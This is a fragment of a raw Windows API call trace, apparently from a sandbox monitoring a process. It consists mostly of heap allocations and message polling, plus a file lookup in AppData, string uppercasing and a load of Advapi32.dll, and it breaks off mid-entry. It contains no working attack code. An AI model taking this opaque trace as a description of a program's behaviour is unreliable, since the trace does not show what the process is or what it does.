0x2a72358 [0200.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0200.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0200.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0200.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0200.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.127] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0200.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0200.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0200.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0200.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0200.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0200.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0200.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.130] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0200.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0200.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0200.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0200.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0200.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0200.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0200.131] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Resmon.ResmonCfg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 0x9e2078 [0200.131] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0200.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0200.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0200.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0200.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0200.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0200.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0200.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0200.134] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0200.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0200.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.135] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.135] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.135] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0200.135] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.135] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.135] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.135] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0200.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0200.136] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0200.136] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.136] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0200.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0200.136] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.137] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0200.137] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.137] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0200.137] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 